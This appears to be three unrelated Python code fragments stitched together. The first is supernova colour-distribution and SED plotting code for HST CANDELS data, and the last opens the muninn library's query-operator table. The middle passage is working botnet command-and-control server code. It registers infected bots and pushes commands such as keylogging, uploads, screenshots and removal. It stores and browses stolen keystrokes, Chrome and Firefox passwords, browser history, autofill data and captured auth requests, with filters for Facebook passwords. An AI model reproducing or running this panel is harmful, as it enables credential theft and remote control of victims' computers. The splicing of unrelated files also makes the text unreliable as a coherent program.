'HST_CANDELS1_adams.dat',
'HST_CANDELS1_vanburen.dat',
]
fig = pl.figure( 5, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
fig = pl.figure( 6, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist3) :
colorCheck( datfile, 5, irow, [5,6] )
def colorcheck_midz4():
datfilelist4 = [
'HST_CANDELS1_mondale.dat',
'HST_CANDELS1_lbj.dat',
'HST_CANDELS1_lincoln.dat',
'HST_CANDELS1_mikulski.dat',
'HST_CANDELS1_madison.dat',
]
fig = pl.figure( 7, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
fig = pl.figure( 8, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist4) :
colorCheck( datfile, 5, irow, [7,8] )
def colorCheck(datfile, nrow, irow, ifiglist=[1,2], clobber=False, verbose=1):
sn = stardust.SuperNova(datfile )
sn.getClassSim( 'HST_colormag', Nsim=2000, dustmodel='mid', simpriors=True, clobber=clobber, verbose=verbose )
pkbands = np.unique([ sn.FLT[i] for i in range(len(sn.MJD)) if abs(sn.MJD[i]-sn.pkmjdobs)<=sn.pkmjdobserr ])
sn.ClassSim.Ia.samplephot( sn.pkmjdobs, tmatch=sn.pkmjdobserr, bandlist=pkbands )
sn.ClassSim.Ibc.samplephot( sn.pkmjdobs, tmatch=sn.pkmjdobserr, bandlist=pkbands )
sn.ClassSim.II.samplephot( sn.pkmjdobs, tmatch=sn.pkmjdobserr, bandlist=pkbands )
ipk = np.where( np.abs(sn.MJD - sn.pkmjdobs)< sn.pkmjdobserr )[0]
for ifig,redfilt in zip(ifiglist,['H','J']) :
if redfilt not in pkbands : continue
fig = pl.figure( ifig )
ax1 = fig.add_subplot( nrow, 4, 1 )
RpkSimIa = sn.ClassSim.Ia.__dict__['%s%i'%(redfilt,int(sn.pkmjdobs))]
RpkSimIbc = sn.ClassSim.Ibc.__dict__['%s%i'%(redfilt,int(sn.pkmjdobs))]
RpkSimII = sn.ClassSim.II.__dict__['%s%i'%(redfilt,int(sn.pkmjdobs))]
ipkR = np.where( sn.FLT[ipk] == redfilt )[0]
if not len(ipkR) : continue
snR = sn.MAG[ipk][ipkR][0]
snRerr = sn.MAGERR[ipk][ipkR][0]
for icol,bluefilt in zip( range(4),['W','V','I','Z']):
ax = fig.add_subplot( nrow, 4, irow*4 + icol + 1, sharex=ax1 )
if icol == 0 : ax.set_ylabel(sn.nickname)
if irow == 0 : ax.set_title( '%s-%s'%(bluefilt,redfilt) )
if bluefilt not in pkbands : continue
ipkB = np.where( sn.FLT[ipk] == bluefilt )[0]
if not len(ipkB) : continue
snB = sn.MAG[ipk][ipkB][0]
snBerr = sn.MAGERR[ipk][ipkB][0]
BpkSimIa = sn.ClassSim.Ia.__dict__['%s%i'%(bluefilt,int(sn.pkmjdobs))]
BpkSimIbc = sn.ClassSim.Ibc.__dict__['%s%i'%(bluefilt,int(sn.pkmjdobs))]
BpkSimII = sn.ClassSim.II.__dict__['%s%i'%(bluefilt,int(sn.pkmjdobs))]
CpkSimIa = BpkSimIa - RpkSimIa
CpkSimIbc = BpkSimIbc - RpkSimIbc
CpkSimII = BpkSimII - RpkSimII
CIa,cbins = np.histogram( CpkSimIa, bins=np.arange(-5,12,0.2) )
CIbc,cbins = np.histogram( CpkSimIbc, bins=np.arange(-5,12,0.2) )
CII,cbins = np.histogram( CpkSimII, bins=np.arange(-5,12,0.2) )
ax.plot( cbins[:-1], CIa, 'r-', drawstyle='steps-mid' )
ax.plot( cbins[:-1], CIbc, 'g-', drawstyle='steps-mid' )
ax.plot( cbins[:-1], CII, 'b-', drawstyle='steps-mid' )
snC = snB - snR
snCerr = np.sqrt( snBerr**2 + snRerr**2 )
snCmin = snC - snCerr
snCmax = snC + snCerr
if snBerr<0 : snCmin = snC
if snRerr<0 : snCmax = snC
ymin,ymax=ax.get_ylim()
snCbar = patches.Rectangle( [ snCmin, 0.0], snCmax-snCmin, ymax, color='0.5', alpha=0.5, zorder=-100 )
ax.add_patch( snCbar )
ax.set_xlim([-2,6])
fig.suptitle( '(W,V,I,Z)-%s band color distributions'%redfilt )
def sedcheck( z=0.68, days=[-10,0,20], cctype='Ibc'):
""" plot the rest-frame SED for Ia , Ib/c and II SNe,
overlaying the braod-band filter curves (blue-shifted)
to see the origin of the color distributions.
"""
fig = pl.figure(1,figsize=(19,12))
pl.clf()
ncol = len(days)
for icol,day in zip(range(ncol),days) :
# reagan: z=0.68, day=-10
# buchanan: z=0.68, day=+20
fig.add_subplot( 1,ncol,icol+1)
plotsed( sedfile='Hsiao07.extrap.dat', day=day, z=0.68, color='r',ls='-',lw=2 )
if cctype=='II': plotIIseds( day=day,z=0.68)
elif cctype=='Ibc': plotIbcseds( day=day,z=0.68)
elif cctype in ['CC','all']:
plotIIseds( day=day,z=0.68)
plotIbcseds( day=day,z=0.68)
plotbands( 'WVIJ', z=z )
ax = pl.gca()
ax.set_xlim(1800,10000)
ax.text( 0.95, 0.95, 't = %i'%int(day), transform=ax.transAxes, ha='right',va='top',fontsize='x-large' )
def plotIIseds( day=0, z=0.68 ):
plotsed( sedfile='SDSS-000018.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-003818.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-013376.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014450.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014599.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015031.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015320.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015339.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-017564.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-017862.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018109.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018297.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018408.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018441.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018457.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018590.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018596.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018700.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018713.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018734.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018793.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018834.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018892.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-020038.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-012842.SED', day=day, z=z, color='c',ls='-',lw=1 )
plotsed( sedfile='SDSS-013449.SED', day=day, z=z, color='c',ls='-',lw=1 )
plotsed( sedfile='Nugent+Scolnic_IIL.SED', day=day, z=z, color='m',ls='-',lw=1 )
def plotIbcseds( day=0, z=0.68 ):
plotsed( sedfile='CSP-2004gv.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2006ep.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2007Y.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-000020.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-002744.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014492.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-019323.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SNLS-04D4jv.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2004fe.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2004gq.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-004012.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-013195.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014475.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015475.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-017548.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SNLS-04D1la.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
def plotsed( sedfile = 'Hsiao07.extrap.dat', day=0, z=0.68, **kwarg ):
""" plot the sed, normalizing such that the integrated J band = 1 """
from scipy import interp
w,f = getsed( sedfile, day=day )
wJ,fJ = getbandpass( 'J' )
fJint = interp( w, wJ/(1+z), fJ, left=0, right=0 )
dw = np.diff(w).mean()
normfactor = (fJint * f).sum() * dw
ax1 = pl.gca()
fmag = -2.5*np.log10( np.where( f>0, f/normfactor, np.ones(len(f))*1e-6) ) + 25
ax1.plot( w, fmag, zorder=20, **kwarg )
ax1.set_xlim(1800,10000)
#ax1.set_yticks([])
ax1.set_ylim(38,27)
ax1.set_ylabel('-2.5 log( f ) + constant' )
ax1.set_xlabel('rest wavelength' )
def plotbands( bands='WVIJ', z=0.68 ):
wJ,fJ = getbandpass( 'J' )
wW,fW = getbandpass( 'W' )
wV,fV = getbandpass( 'V' )
wI,fI = getbandpass( 'I' )
ax1 = pl.gca()
ax2 = ax1.twinx()
if 'J' in bands : ax2.fill_between( wJ/(1+z), fJ, color='r', zorder=-20, alpha=0.3 )
if 'V' in bands : ax2.fill_between( wV/(1+z), fV, color='b', zorder=-20, alpha=0.3 )
if 'I' in bands : ax2.fill_between( wI/(1+z), fI, color='g', zorder=-20, alpha=0.3 )
if 'W' in bands : ax2.fill_between( wW/(1+z), fW, color='k', zorder=-40, alpha=0.3 )
ax2.set_ylim(0,0.3)
ax2.set_yticks([])
def getbandpass( band='J' ):
srcdir = sys.argv[0]
if srcdir.endswith('python'): srcdir = __file__
filtdir = os.path.abspath( os.path.dirname( srcdir ) +'/../figs/FILTER' )
if band=='V':
return( np.loadtxt( os.path.join(filtdir,'ACS_WFC_F606W.dat'), unpack=True ) )
elif band=='I':
return( np.loadtxt( os.path.join(filtdir,'ACS_WFC_F814W.dat'), unpack=True ) )
elif band=='Z':
return( np.loadtxt( os.path.join(filtdir,'ACS_WFC_F850LP.dat'), unpack=True ) )
elif band=='W':
return( np.loadtxt( os.path.join(filtdir,'WFC3_UVIS_F350LP.dat'), unpack=True ) )
elif band=='J':
return( np.loadtxt( os.path.join(filtdir,'WFC3_IR_F125W.dat'), unpack=True ) )
elif band=='H':
return( np.loadtxt( os.path.join(filtdir,'WFC3_IR_F160W.dat'), unpack=True ) )
def getsed( sedfile = 'Hsiao07.extrap.dat', day=None) :
if not os.path.isfile( sedfile ) :
sedfile = os.path.join( sndataroot, 'snsed/%s'%sedfile)
if not os.path.isfile( sedfile ) :
sedfile = os.path.join( sndataroot, 'snsed/non1a/%s'%os.path.basename(sedfile) )
if not os.path.isfile( sedfile ) :
print("cannot find %s"%os.path.basename(sedfile) )
d,w,f = np.loadtxt( sedfile, unpack=True )
if day!=None :
dout = d[ np.where( np.abs(d-day)<0.9 ) ]
wout = w[ np.where( np.abs(d-day)<0.9 ) ]
fout = f[ np.where( np.abs(d-day)<0.9 ) ]
return( wout, fout )
else :
days = unique( d )
dout = dict( [ [day, d[ np.where( d==day ) ]] for day in days ] )
wout = dict( [ [day, w[ np.where( d==day ) ]] for day in days ] )
fout = dict( [ [day, f[ np.where( d==day ) ]] for | |
Path(target0)
if my_file.is_file():
with open(target0, "r") as d:
if file_is_empty(target0)== True:
html = html.replace("{{KL}}","No Keystrokes Stored.")
else:
switch = False
for line in d:
CURRENT_WINDOW = ''
TIME_WINDOW = ''
STROKES = ''
tabletorpl = ''
tdpreset = '''<table class="table_info"><tr>
<th>Window Title Name</th>
<td>{{WTN}}</td>
</tr>
<tr>
<th>Time</th>
<td>{{TM}}</td>
</tr><tr>
<th>Keys Pressed</th>
<td>{{STK}}</td>
</tr></table><br><br>{{END}}'''
if line.startswith("["):
CURRENT_WINDOW = line.split("]")[0]
CURRENT_WINDOW = CURRENT_WINDOW.replace("[","")
tabletorpl = tdpreset.replace("{{WTN}}",CURRENT_WINDOW)
TIME_WINDOW = line.split("@", 2)[2]
TIME_WINDOW = TIME_WINDOW.split("|||")[0]
tabletorpl = tabletorpl.replace("{{TM}}",TIME_WINDOW)
STROKES = line.split("|||")[1]
tabletorpl = tabletorpl.replace("{{STK}}",STROKES)
if switch == True:
html = html.replace("{{END}}",tabletorpl)
else:
html = html.replace("{{KL}}",tabletorpl)
switch = True
switch = True
else:
pass
else:
html = html.replace("{{KL}}","No Keystrokes Stored.")
html = html.replace("{{botid}}", botid)
html = html.replace("{{END}}", "")
return html
@cherrypy.expose
@require_admin
def dbpass(self,*argv):
SaveLog("REQUEST : 200 [ Ok ] | Database.html")
with open("html/DbPass.html", "r") as f:
html = f.read()
try:
file = open("TempDir/tmp.txt", "r")
buffer_ = file.read()
if buffer_ == "":
buffer_ = "No matches found for this research."
buffer_ = buffer_.replace("\n","<br>")
buffer_ = buffer_.replace("Website:","<b>Website</b>:")
buffer_ = buffer_.replace("Username:","<b>Username</b>:")
buffer_ = buffer_.replace("Password:","<b>Password</b>:")
buffer_ = buffer_.replace("DumpDir/","")
except :
buffer_ = ""
html = html.replace("{{results}}",buffer_)
try:
os.remove("TempDir/tmp.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def chrome(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Chrome.html -> %s " % botid)
html = ''
krc = ''
hic = ''
afc = ''
mln = 1000
with open("html/Chrome.html", "r") as f:
html = f.read()
target0 = "DumpDir/%s/KRC.txt" % botid
target1 = "DumpDir/%s/HIC.txt" % botid
target2 = "DumpDir/%s/AFC.txt" % botid
try:
max_counter0 = 0
max_counter1 = 0
max_counter2 = 0
html = html.replace("{{botid}}",botid)
f = codecs.open(target0, encoding='utf-8')
for line in f:
if max_counter0 == mln:
krc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target0)
break
krc += repr(line)
max_counter0 += 1
krc = krc.replace("'","'")
krc = krc.replace("\\n'","<br>")
krc = krc.replace("u'","")
html = html.replace("{{KRC}}",krc)
h = codecs.open(target1, encoding='utf-8')
for line in h:
if max_counter1 == mln:
hic += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target1)
break
hic += repr(line)
max_counter1 += 1
hic = hic.replace("'","'")
hic = hic.replace("u'","")
hic = hic.replace("\\n'","<br>")
html = html.replace("{{HIC}}",hic)
y = codecs.open(target2, encoding='utf-8')
for line in y:
if max_counter2 == mln:
afc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target2)
break
afc += repr(line)
max_counter2 += 1
afc = afc.replace("'","'")
afc = afc.replace("u'","")
afc = afc.replace("\\n'","<br>")
afc = afc.replace(""",'"')
html = html.replace("{{AFC}}",HTMLParser.HTMLParser().unescape(afc))
except:
html = html.replace("{{KRC}}","Nothing Here.")
html = html.replace("{{HIC}}","Nothing Here.")
html = html.replace("{{AFC}}","Nothing Here.")
return html
@cherrypy.expose
@require_admin
def getcache(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Cache.html => %s" % botid)
with open("html/Cache.html", "r") as f:
html = f.read()
final_html = ''
filepath = "DumpDir/%s/getauth.txt" % botid
try:
with open(filepath,"r") as t:
everything = t.read()
if everything != "":
for item in everything.split("]]]==="):
if "===[[[" in item:
TABLE_PRESET = '''<table>
<tr>
<th>Request Type:</th>
<td>{{Request-Type}}</td>
</tr>
<tr>
<th>Host-Website:</th>
<td style="color:red">{{Host}}</td>
</tr>
<tr>
<th>User Agent:</th>
<td>{{User-Agent}}</td>
</tr>
<tr>
<th>Language:</th>
<td>{{Language}}</td>
</tr>
<tr>
<th>Hour:</th>
<td>{{Time}}</td>
</tr>
<tr>
<th>Cookie:</th>
<td>{{Cookie}}</td>
</tr>
<th>Payload-Credentials:</th>
<td style="color:red">{{Payload}}</td>
</tr>
</table><br>'''
TABLE_UNSORTED_PACKET = '''<table>
<tr>
<th> ( Unsorted Packet ) Packet Content:</th>
<td>{{pkt}}</td>
</tr>
</table><br>'''
buffer = item [ item.find("===[[[")+len("===[[[") : ]
COMPLETE_PACKET = ''
REQUEST_TYPE = ''
HOST = ''
USER_AGENT = ''
LANGUAGE = ''
HOUR = ''
COOKIE = ''
PAYLOAD = ''
COMPLETE_PACKET = find_between( buffer, "((", "))" )
REQUEST_TYPE = COMPLETE_PACKET.split(" ")[0]
HOST = find_between( COMPLETE_PACKET , "Host:", "\n" )
HOST = HOST.replace(" ","")
USER_AGENT = find_between( COMPLETE_PACKET , "User-Agent:", "\n" )
USER_AGENT = USER_AGENT.replace(" ","")
LANGUAGE = find_between( COMPLETE_PACKET , "Accept-Language:", "," )
LANGUAGE = LANGUAGE.replace(" ","")
HOUR = COMPLETE_PACKET.split("{{{")[1]
COOKIE = find_between( COMPLETE_PACKET , "Cookie:", "auth_key" )
COOKIE = COOKIE.replace(" ","")
PAYLOAD = find_between( COMPLETE_PACKET , "auth_key=" , "{{{")
TABLE_PRESET = TABLE_PRESET.replace("{{Request-Type}}",REQUEST_TYPE)
TABLE_PRESET = TABLE_PRESET.replace("{{Host}}",HOST)
TABLE_PRESET = TABLE_PRESET.replace("{{User-Agent}}",USER_AGENT)
TABLE_PRESET = TABLE_PRESET.replace("{{Language}}",LANGUAGE)
TABLE_PRESET = TABLE_PRESET.replace("{{Time}}",HOUR)
TABLE_PRESET = TABLE_PRESET.replace("{{Cookie}}",COOKIE)
TABLE_PRESET = TABLE_PRESET.replace("{{Payload}}",PAYLOAD)
final_html += TABLE_PRESET
if PAYLOAD == '':
try:
TABLE_PRESET = ''
TABLE_PRESET = TABLE_UNSORTED_PACKET.replace("{{pkt}}",COMPLETE_PACKET)
except:
pass
except:
final_html = 'File getauth.txt not found!'
html = html.replace("{{botid}}",botid)
kwords = ['password','username','pwd','usr','pass','user','email','referer']
try:
for word in kwords:
try:
TABLE_PRESET = TABLE_PRESET.replace(word,'<span style="color:black;background-color:#f4eb42;"><b>%s</b></span>'%word)
except:
pass
final_html = TABLE_PRESET
except:
pass
html = html.replace("{{Table_preset}}",final_html)
return html
class API(object):
@cherrypy.expose
@require_admin
def passupdate_setting(self, password=''):
SaveLog("REQUEST : 200 [ Ok ] | Admin password updated.")
set_admin_password(password)
@cherrypy.expose
@require_admin
def removebot(self, botid):
global BUFFER_BOT_REMOVED
cmd = "removeme"
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("Removing Bot.")
exec_DB("DELETE FROM bots WHERE name=?",(html_escape(botid),))
BUFFER_BOT_REMOVED.append(botid)
@cherrypy.expose
@require_admin
def klog(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), "keylogger %s" % cmd , False, html_escape(botid)))
@cherrypy.expose
def pop(self, botid, sysinfo, ip):
global BUFFER_BOT_REMOVED
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
bot = query_DB("SELECT * FROM bots WHERE name=?", (botid,))
if not bot:
if botid in BUFFER_BOT_REMOVED :
SaveLog("Bot Removed Tried To Connect: botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
BUFFER_BOT_REMOVED = []
else:
exec_DB("INSERT INTO bots VALUES (?, ?, ?, ?)", (html_escape(botid), time.time(), ip, html_escape(sysinfo)))
SaveLog("Storing New Bot : botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
if not os.path.exists("DumpDir/%s" % botid):
os.makedirs("DumpDir/%s" % botid)
else:
exec_DB("UPDATE bots SET lastonline=? where name=?", (time.time(), botid))
cmd = query_DB("SELECT * FROM commands WHERE bot=? and sent=? ORDER BY date", (botid, 0))
if cmd:
exec_DB("UPDATE commands SET sent=? where id=?", (1, cmd[0][0]))
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), "> " + cmd[0][2], html_escape(botid)))
return cmd[0][2]
else:
return ""
@cherrypy.expose
def worldupdate(self):
thread = Thread(target = worldgen)
thread.start()
thread.join()
@cherrypy.expose
def report(self, botid, output):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
if "{{info}}" in html_escape(output):
md_buffer = html_escape(output).split("{{info}}")[1]
out_file = open("DumpDir/%s/info.txt"% html_escape(botid),"w")
md_buffer = md_buffer.replace("{{info}}","")
out_file.write(md_buffer)
out_file.close()
elif "MD-STATUS" in html_escape(output):
md_buffer = html_escape(output).split(":")[1]
filename = "Logs/MassDownloadReport.txt"
out_file = open(filename,"a")
current_time = strftime("[%H-%M-%S_%d-%m-%Y]", gmtime())
texttowrite= str(current_time) + "\t[ " + str(html_escape(botid)) + " ] [ MD-STATUS:%s - OK ]\n" % str(md_buffer)
out_file.write(texttowrite)
out_file.close()
elif "{{KEYLOGS}}" in html_escape(output):
out_file = open("DumpDir//%s//Keystrokes.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("{{KEYLOGS}}","")
out_file.write(buffer_html)
out_file.close()
SaveLog("Updating Keystrokes.")
elif "KRC{{{" in html_escape(output):
if not os.path.exists("DumpDir//%s" % html_escape(botid)):
os.makedirs("DumpDir//%s"% html_escape(botid))
out_file = open("DumpDir//%s//KRC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("KRC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Keywords Searched.")
elif "HIC{{{" in html_escape(output):
out_file = open("DumpDir//%s//HIC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("HIC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => History.")
elif "AFC{{{" in html_escape(output):
out_file = open("DumpDir//%s//AFC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("AFC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Autofill Fields.")
elif "{{getrequestauth}}" in html_escape(output):
out_file = open("DumpDir//%s//getauth.txt" % html_escape(botid) ,"a")
buffer_html = ""
buffer_html = html_escape(output).replace("{{getrequestauth}}","")
out_file.write("===[[[((" + buffer_html + "))]]]===\n\n")
out_file.close()
SaveLog("Storing auth GET request.")
elif "CHROME PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("CHROME PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s.txt"% html_escape(botid),"w")
out_file.write("\nCHROME PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Chrome Passwords.")
elif "FIREFOX PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("FIREFOX PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s-firefox.txt" % html_escape(botid),"w")
out_file.write("\nFIREFOX PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Firefox Passwords.")
else:
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), html_escape(output), html_escape(botid)))
@cherrypy.expose
@require_admin
def push(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("REQUEST : 200 [ Ok ] | push.html")
if "upload" in cmd:
uploads = cmd[cmd.find("upload"):]
up_cmds = [i for i in uploads.split("upload ") if i]
for upload in up_cmds:
end_pos = upload.find(";")
while end_pos > 0 and cmd[end_pos - 1] == '\\':
end_pos = cmd.find(";", end_pos + 1)
upload_filename = upload
if end_pos != -1:
upload_filename = upload_filename[:end_pos]
pending_uploads.append(os.path.basename(upload_filename))
if cmd.startswith("screenshot"):
pending_uploads.append("screenshot")
@cherrypy.expose
@require_admin
def sortKW(self, keyword):
SaveLog("Request Password DB => Sorting By KeyWord : %s " % keyword)
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if keyword in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + pwd.rstrip() +"\n\n"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
data.close()
@cherrypy.expose
@require_admin
def sortIP(self, ip):
try:
write_buffer = ''
write_buffer0 = ''
file = open('DumpDir/%s.txt' %ip, 'r')
write_buffer += "--[ Results in <b>%s</b> \n\n" % ip
write_buffer_0 = file.read()
write_buffer_0 = write_buffer_0.replace("[*] All Firefox Passwords Dumped .","")
write_buffer_0 = write_buffer_0.replace("Website:","<b>Website</b>:")
write_buffer_0 = write_buffer_0.replace("Username:","<b>Username</b>:")
write_buffer_0 = write_buffer_0.replace("Password:","<b>Website</b>:")
write_buffer += write_buffer_0
out_file = open("TempDir/tmp.txt","w")
out_file.write(write_buffer)
out_file.close()
SaveLog("Request Password DB => Sorting By IP : %s " % ip)
except:
SaveLog("Error : Sorting by IP , No File Found.")
@cherrypy.expose
@require_admin
def sortSel(self, mode):
if mode == "face":
SaveLog("Request Password DB => Printing All Facebook Passwords")
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if "facebook" in data[i] or "Facebook" in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd | |
<reponame>DalavanCloud/muninn
#
# Copyright (C) 2014-2019 S[&]T, The Netherlands.
#
from __future__ import absolute_import, division, print_function
from muninn._compat import string_types as basestring
import copy
import datetime
import re
import uuid
import muninn.geometry as geometry
from muninn.enum import Enum
from muninn.exceptions import *
from muninn.function import Prototype, FunctionTable
from muninn.schema import *
from muninn.visitor import Visitor
#
# Table of all supported operators and functions.
#
function_table = FunctionTable()
#
# Logical operators.
#
function_table.add(Prototype("not", (Boolean,), Boolean))
function_table.add(Prototype("and", (Boolean, Boolean), Boolean))
function_table.add(Prototype("or", (Boolean, Boolean), Boolean))
#
# Comparison operators.
#
function_table.add(Prototype("==", (Long, Long), Boolean))
function_table.add(Prototype("==", (Long, Integer), Boolean))
function_table.add(Prototype("==", (Integer, Long), Boolean))
function_table.add(Prototype("==", (Integer, Integer), Boolean))
function_table.add(Prototype("==", (Real, Real), Boolean))
function_table.add(Prototype("==", (Real, Long), Boolean))
function_table.add(Prototype("==", (Long, Real), Boolean))
function_table.add(Prototype("==", (Real, Integer), Boolean))
function_table.add(Prototype("==", (Integer, Real), Boolean))
function_table.add(Prototype("==", (Boolean, Boolean), Boolean))
function_table.add(Prototype("==", (Text, Text), Boolean))
function_table.add(Prototype("==", (Timestamp, Timestamp), Boolean))
function_table.add(Prototype("==", (UUID, UUID), Boolean))
function_table.add(Prototype("!=", (Long, Long), Boolean))
function_table.add(Prototype("!=", (Long, Integer), Boolean))
function_table.add(Prototype("!=", (Integer, Long), Boolean))
function_table.add(Prototype("!=", (Integer, Integer), Boolean))
function_table.add(Prototype("!=", (Real, Real), Boolean))
function_table.add(Prototype("!=", (Real, Long), Boolean))
function_table.add(Prototype("!=", (Long, Real), Boolean))
